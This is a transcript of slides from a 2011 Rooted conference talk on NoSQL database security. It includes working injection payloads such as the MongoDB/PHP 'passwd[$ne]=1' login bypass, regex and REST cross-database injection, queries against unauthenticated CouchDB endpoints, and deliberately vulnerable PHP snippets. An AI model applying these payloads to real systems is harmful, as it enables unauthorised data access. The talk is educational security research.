rooted 2011 nosql security
DESCRIPTION
NoSQL Security presented on Rooted 2011TRANSCRIPT
![Page 1: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/1.jpg)
NoSQL Security
José Ramón Palanco
miércoles 16 de marzo de 2011
![Page 2: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/2.jpg)
Agenda
✦ NoSQL Introduction✦ NoSQL vs RDBMS✦ NoSQL Arquitecture✦ NoSQL Implementations
✦ Attack vectors✦ Injections✦ Key Bruteforce✦ HTTP Protocol Based Attacks in listeners✦ Cassandra security y Thrift security✦ Denial of Service (connection pollution, evil queries)
miércoles 16 de marzo de 2011
![Page 3: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/3.jpg)
NOSQLIntroduction
miércoles 16 de marzo de 2011
![Page 4: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/4.jpg)
¿What is NoSQL?
✦ In general, don’t need table scheme and don’t uses “join”
✦ NoSQL solutions don’t imeplement one or more ACID properties
miércoles 16 de marzo de 2011
![Page 5: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/5.jpg)
CAP Theorem
✦ Properties: consistency, availability and partitions
✦ At least need 2 of them
✦ To scale partition is needed
✦ In general is preferer availability over consistency
miércoles 16 de marzo de 2011
![Page 6: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/6.jpg)
NoSQL ArquitectureRDBMS NoSQL
HTTP Server
Connector BBDD
Client
SQL
ODBC, ADO, JDBC
HTTP Server
Connector BBDD
Client
REST, JSON, XML, ...
Binary, HTTP, ...
miércoles 16 de marzo de 2011
![Page 7: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/7.jpg)
NoSQL vs RDBMS✦ RDBMS show poor performance and
scalability in application which make a heavy use of data
✦ Cloud Computing (SaaS)
✦ Social Networks (SN)
✦ To make complex queries is not possible perform them with something diferent than RDBMS
miércoles 16 de marzo de 2011
![Page 8: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/8.jpg)
Enviroments
✦ In lot of enviroments is need to distribute writes in clusters, MapReduce, ..
✦ Facebook needs store 135 billions of messages each month
✦ Twitter stores 7 TB diary
miércoles 16 de marzo de 2011
![Page 9: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/9.jpg)
Disadvantages NoSQL
✦ OLTP
✦ SQL
✦ Ad-Hoc queries
✦ Complex relations
miércoles 16 de marzo de 2011
![Page 10: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/10.jpg)
NoSQL Arquitectures
✦ Document store
✦ Graph
✦ Key-value store
✦ Multivalue
✦ Objets
✦ Tabular
miércoles 16 de marzo de 2011
![Page 11: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/11.jpg)
Key-value store
✦ CouchDB:
✦ MongoDB
✦ Terrastore
✦ ThruDB
✦ OrientDB
✦ RavenDB
miércoles 16 de marzo de 2011
![Page 12: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/12.jpg)
Graph
✦ Neo4J
✦ Sones
✦ InfoGrid
✦ HypergraphDB
✦ AllegroGraph
✦ BigData
miércoles 16 de marzo de 2011
![Page 13: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/13.jpg)
Key-value
✦ Redis
✦ Riak
✦ Tokio Cabinet
✦ MemcacheDB
✦ Membase
✦ Azure
miércoles 16 de marzo de 2011
![Page 14: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/14.jpg)
Multivalue
✦ U2
✦ OpenInsight
✦ OpenQM
miércoles 16 de marzo de 2011
![Page 15: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/15.jpg)
Objets
✦ db4o
✦ Versant
✦ Objetivity
✦ NEO
miércoles 16 de marzo de 2011
![Page 16: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/16.jpg)
MongoDB
✦ Protocol: Binary (BSON)
✦ API: several languages
✦ Query: JavaScript/JSON
✦ Language: C++
miércoles 16 de marzo de 2011
![Page 17: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/17.jpg)
Features• Schema-Free (JSON)
• Document Oriented, Not Relational
• Highly Concurrent
• RESTful HTTP API
• JavaScript-Powered Map/Reduce
• N-Master Replication
• Robust Storage
CouchDB
✦ Protocol: REST
✦ API: JSON
✦ Query: MapReduce (JS)
✦ Language: Erlang
miércoles 16 de marzo de 2011
![Page 18: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/18.jpg)
{"couchdb":"Welcome","version":"0.11.0"}$ telnet 172.16.163.129 5984Trying 172.16.163.129...Connected to 172.16.163.129.Escape character is '^]'.GET /rooted/ HTTP/1.1Host: localhost
HTTP/1.1 200 OKServer: CouchDB/0.11.0 (Erlang OTP/R14B)Date: Sat, 19 Feb 2011 05:20:28 GMTContent-Type: text/plain;charset=utf-8Content-Length: 188Cache-Control: must-revalidate
{"db_name":"rooted","doc_count":1,"doc_del_count":0,"update_seq":1,"purge_seq":0,"compact_running":false,"disk_size":4182,"instance_start_time":"1298092462502662","disk_format_version":5}
miércoles 16 de marzo de 2011
![Page 19: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/19.jpg)
{"couchdb":"Welcome","version":"0.11.0"}$ telnet 172.16.163.129 5984Trying 172.16.163.129...Connected to 172.16.163.129.Escape character is '^]'.GET /rooted/f34aae022f67a23ac56dba5b4e000cf2 HTTP/1.1Host: localhost
HTTP/1.1 200 OKServer: CouchDB/0.11.0 (Erlang OTP/R14B)Etag: "1-2512702fff02fe841adecde4a22c62b5"Date: Sat, 19 Feb 2011 05:20:47 GMTContent-Type: text/plain;charset=utf-8Content-Length: 155Cache-Control: must-revalidate
{"_id":"f34aae022f67a23ac56dba5b4e000cf2","_rev":"1-2512702fff02fe841adecde4a22c62b5","Nombre":"Jose","DNI":"9393948K","telefono":999999999}Connection closed by foreign host.
miércoles 16 de marzo de 2011
![Page 20: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/20.jpg)
Redis
✦ Protocol: Plain Telnet
✦ API: Several Languages
✦ Query: Commands
✦ Language: C/C++
miércoles 16 de marzo de 2011
![Page 21: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/21.jpg)
✦ Protocol: Binary (Thrift)
✦ API: Thrift
✦ Query: Column/ranges
✦ Languages: Java
Cassandra
miércoles 16 de marzo de 2011
![Page 22: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/22.jpg)
Cassandra
✦ Column (tuple/triplet)
✦ Supercolumn (composed by columns)
✦ Column Family (contains supercolumns)
✦ Keyspace (stores column families)
miércoles 16 de marzo de 2011
![Page 23: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/23.jpg)
Cassandra
<Keyspace Name="BloggyAppy"> <!-- CF definitions --> <ColumnFamily CompareWith="BytesType" Name="Authors"/> <ColumnFamily CompareWith="BytesType" Name="BlogEntries"/> <ColumnFamily CompareWith="TimeUUIDType" Name="TaggedPosts"/> <ColumnFamily CompareWith="TimeUUIDType" Name="Comments" CompareSubcolumnsWith="BytesType" ColumnType="Super"/> </Keyspace>
storage-conf.xml
miércoles 16 de marzo de 2011
![Page 24: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/24.jpg)
Attack vectors
miércoles 16 de marzo de 2011
![Page 25: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/25.jpg)
Introduction
✦ Several database concepts
✦ Several implementations
✦ So attack vectors are very specifics and depends on each implementation
miércoles 16 de marzo de 2011
![Page 26: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/26.jpg)
HTTP Based Attacks✦ ¿Who uses HTTP?
✦ CouchDB
✦ HBASE
✦ Riak
✦ ¿How to locate vulnerabilities?
✦ fuzzing: hzzp
miércoles 16 de marzo de 2011
![Page 27: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/27.jpg)
Listeners explotation
✦ As they work on HTTP, it’s possible use cache proxies misconfigured to get access
$ telnet server.com 80Trying X.X.X.X...Connected to server.com.Escape character is '^]'GET /_all_dbsHost: 192.168.2.18
miércoles 16 de marzo de 2011
![Page 28: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/28.jpg)
JSON Injection
db.foo.find( { $or : [ { a : 1 } , { b : 2 } ] } )
db.foo.find( { $or : [ { a : 1 } , { b : 2 }, { c : /.*/ } ] } )
In the same way that the SQL is escaped, when working with
CouchDB or MongoDB, we should do the same
miércoles 16 de marzo de 2011
![Page 29: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/29.jpg)
Array InjectionMongoDB + PHP
✦ In PHP it is possible that a variable is an array by adding brackets
✦ If admin passwd ‘Not Equal’ anything, you can access
✦ Besides that of $ne, we can inject:
✦ $or, $exists, $nin, $in, $lt, ... (logics)
✦ &var[‘$regex’]=/privileged/i (regex)
<?$collection->find(array( "username" => $_GET['username'], "passwd" => $_GET['passwd']));
?>
/login.php?username=admin&passwd[$ne]=1
<?$collection->find(array( "username" => "admin", "passwd" => array("$ne" => 1)));?>
miércoles 16 de marzo de 2011
![Page 30: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/30.jpg)
View Injection
✦ CouchDB uses SpiderMonkey as scripting engine
✦ The views are loaded as js
$ ldd /usr/lib/couchdb/bin/couchjs libcurl.so.4 => /usr/lib/libcurl.so.4 (0x00007f7124325000) libmozjs.so.2d => /usr/lib/libmozjs.so.2d (0x00007f7124063000) ...
miércoles 16 de marzo de 2011
![Page 31: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/31.jpg)
View Injection
✦ There are predefined views and temporary
✦ To make MapReduce
✦ Get arbitrary data, change values to alter the execution flow
miércoles 16 de marzo de 2011
![Page 32: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/32.jpg)
REST INJECTION
✦ Cross Database:
✦ /?db=_all_dbs
✦ /?db=myusers
<?$dbname = $_GET["db"];$doc_id = $_GET["d_id"];$resp = $couch->send("GET", "/" . $dbname ."/" . $doc_id);?>
miércoles 16 de marzo de 2011
![Page 33: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/33.jpg)
CouchDB info
✦ http://172.16.163.129:5984/_config
✦ http://172.16.163.129:5984/_all_dbs
✦ http://172.16.163.129:5984/_stats
✦ http://172.16.163.129:5984/_utils
miércoles 16 de marzo de 2011
![Page 34: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/34.jpg)
CouchDB cmd exec.
miércoles 16 de marzo de 2011
![Page 35: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/35.jpg)
GQL Injection
✦ You can reach GQL injection, but in a very controlled environment
✦ There is no negation operator "!"
✦ The set of GQL commands is very limited
miércoles 16 de marzo de 2011
![Page 36: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/36.jpg)
Key Bruteforce
✦ As there are no schemes, we do not have to find out them
✦ The IDs are large, but not generated at random:
e479f720ff9a05fb2f441fef97000c87
e479f720ff9a05fb2f441fef97000b61
miércoles 16 de marzo de 2011
![Page 37: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/37.jpg)
Cassandra Security
✦ If we change the name of a family, we can get items from other family
<? ... $columnParent = new cassandra_ColumnParent(); $columnParent->super_column = NULL;
if(isset($_GET[‘CF’])) $columnParent->column_family = $_GET[‘CF’].“_myfam”;
$sliceRange = new cassandra_SliceRange(); $sliceRange->start = ""; $sliceRange->finish = ""; $predicate = new cassandra_SlicePredicate(); list() = $predicate->column_names; $predicate->slice_range = $sliceRange;
$consistency_level = cassandra_ConsistencyLevel::ONE;
$keyUserId = 1; $result = $client->get_slice($keyspace, $keyUserId, $columnParent, $predicate, $consistency_level);
print_r($result); ...
?>
miércoles 16 de marzo de 2011
![Page 38: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/38.jpg)
Denial of Service
✦ Connection polution
✦ Couchdb-> implementación interface = restfull
✦ With GQL, it is possible to perform a DoS creating queries which make an intensive use of CPU and will be disconnected or be billed for that extra CPU
miércoles 16 de marzo de 2011
![Page 39: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/39.jpg)
Questions
miércoles 16 de marzo de 2011
![Page 40: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/40.jpg)
Questions
miércoles 16 de marzo de 2011